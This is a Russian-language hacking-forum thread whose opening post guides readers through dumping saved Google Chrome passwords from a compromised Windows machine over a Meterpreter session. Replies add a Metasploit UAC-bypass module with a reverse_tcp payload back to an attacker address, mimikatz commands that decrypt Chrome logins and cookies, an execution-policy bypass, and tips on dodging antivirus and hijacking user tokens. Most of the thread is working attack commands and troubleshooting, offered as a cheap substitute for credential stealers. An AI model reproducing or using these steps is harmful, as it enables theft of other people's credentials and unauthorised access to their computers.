• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Dump Chrome Passwords

OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник:

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

Dump Chrome Passwords



2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid
Создание каталога:

Код:
mkdir Pass
cd Pass
Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll



Dump Chrome Passwords


3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
Dump Chrome Passwords


Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.





Я бы даже выделил следующие преимущества:
  1. Просто в исполнении.
  2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
  3. Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
 

Вложения

Последнее редактирование:
woolf1514

woolf1514

Well-known member
06.03.2017
162
169
Не сработало =( Windows server 2012 R2 Build 9600

Dump Chrome Passwords


И так далее. Может еще в какой процесс мигрировать?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 991
Не сработало =( Windows server 2012 R2 Build 9600

Посмотреть вложение 13407

И так далее. Может еще в какой процесс мигрировать?
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
 
Последнее редактирование:
woolf1514

woolf1514

Well-known member
06.03.2017
162
169
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 991
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
17.jpg
 
Ondrik8

Ondrik8

prodigy
Happy New Year
08.11.2016
1 006
2 989
от себя дополню)


грабит пассы от всего включая браузеры

грабит пасы chrome от огрызков OSX

ну а вообще <mimikatz> умеет тоже делать такие вещи

Код:
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
Автору, жму руку: "молодец что не сдаешься, выход есть всегда!)"
 
A

adm2

Well-known member
05.07.2017
50
117
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
 
woolf1514

woolf1514

Well-known member
06.03.2017
162
169
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
Посмотреть вложение 13408
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 991
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
То доступ к домашней папке по идеи не должно запросить повышенный. В случае вульфа у него доступ ограничен к домашней папке админа и требует повышенных привилегий.
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю.
[doublepost=1511950351,1511950029][/doublepost]
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
Ну у тебя по скрину видно что ексепшн из-за того что скрипт не может зайти в папку локального админа,так как дб файл паролей хрома хранится локально в домашней папки юзера.
 
Ondrik8

Ondrik8

prodigy
Happy New Year
08.11.2016
1 006
2 989
миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)
 
  • Нравится
Реакции: Vertigo, OneDollar и IioS
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Я только включаюсь в работу. Значит пока то что есть, могу показать какие у меня привилегии в системе где получилось взять пассы. В течении дня выложу результаты по 10. Спасибо всем!

Dump Chrome Passwords


Dump Chrome Passwords
 
  • Нравится
Реакции: id2746
S

swap3r

Happy New Year
06.11.2016
71
57
Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере.
Спасибо.
 
  • Нравится
Реакции: TST
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

Dump Chrome Passwords


Dump Chrome Passwords
 

Вложения

Последнее редактирование:
T

TST

Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник:

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

Посмотреть вложение 13384


2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid
Создание каталога:

Код:
mkdir Pass
cd Pass
Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll



Посмотреть вложение 13388

3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
Посмотреть вложение 13387

Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.





Я бы даже выделил следующие преимущества:

  1. Просто в исполнении.
    Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
    Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
При загрузке выдает ошибку что
core_channel_open: Operation failed: The system cannot find the path specified.
Dump Chrome Passwords
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

Посмотреть вложение 13423

Посмотреть вложение 13425
Решил допилить темку. Значится так, если мы видим сообщения как здесь на скрине, то все что нам нужно сделать это :

Код:
powershell Set-ExecutionPolicy BYPASS
Подробнее что мы делаем данной командой в шеле и

Важно, привилегии при этом должны быть именно администратора. Как писал в коментах ~~DarkNode~~ " как будто вы на целевой машине запускается что-либо от имени админа" так и тут ! Метод получения прав админа я описал в своей следующей статье связанной с дампом информации из буфера обмена, там то и описаны способы повышения привилегий до админ. Чекайте тут

Важно: вы должны находится в процессе с х64 иначе скрипт так же не отработает, в подробностях не могу сказать почему, позабыл где читал, но у меня так же не отрабатывал будь я в любом процессе х86!

Есть процесс повершел х86 и х64. Нам нужно разрешить запуск скрипта для двух этих шеллов. Для этого

Код:
x64 shell C:\Windows\syswow64\Windowspowershell\v1.0\powershell Set-ExecutionPolicy BYPASS[/B][/B][/B]
[B][B][B]x32 shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell Set-ExecutionPolicy BYPASS

Dump Chrome Passwords


Dump Chrome Passwords

Если мы в метерпретере, то так же нужно проверить разрядность командной строки или повершел

Код:
В CMD: echo %PROCESSOR_ARCHITECTURE%
В Powershell: powershell [Environment]::Is64BitProcess
Мы должны видеть это :

Dump Chrome Passwords

Dump Chrome Passwords

Если соблюдены все правила :

1. мы от админа
2. мы разрешили запуск скриптов ps1 без их проверки как для х64 так и для х86 powershell
3. мы находимся в х64 процессе
4. мы полили клавиатуру святой водой

То на выходе получим это :



PROF1T!
В заключении хочу сказать, что все легко и просто бывает только в сказках. В любом случае каждая система требует индивидуальных извращений. С одной из таких и я столкнулся. Так же виндовс 10, так же процесс х64. Так же права админа, также разрешен запуск скриптов без разрешения, но подвел именно декрипт! Мне выбило пассы в левом столбце, а логины и адреса сайтов в дикую перемешку справа! Я так и не смог с помощью данного способа получить адекватно пассы. Но сдаваться когда есть цель нельзя! Я не просто так говорю, потому что я пошел далее, дождался пока агент будет АФК, убил процессы хрома (это одно из главных правил при получении паролей в империи) и будучи при админ правах запустил дамп пассов с хрома и получил их!! Действуйте, не сдавайтесь, ищите новые лазейки, проявляйте творчество в этом не легком деле и даже после 100 поражений и будет вам результат!
 
~localhost

~localhost

Happy New Year
30.10.2017
168
49
у меня на стадии миграции уже проблемы, windows 7 pro. sp1
 
Мы в соцсетях: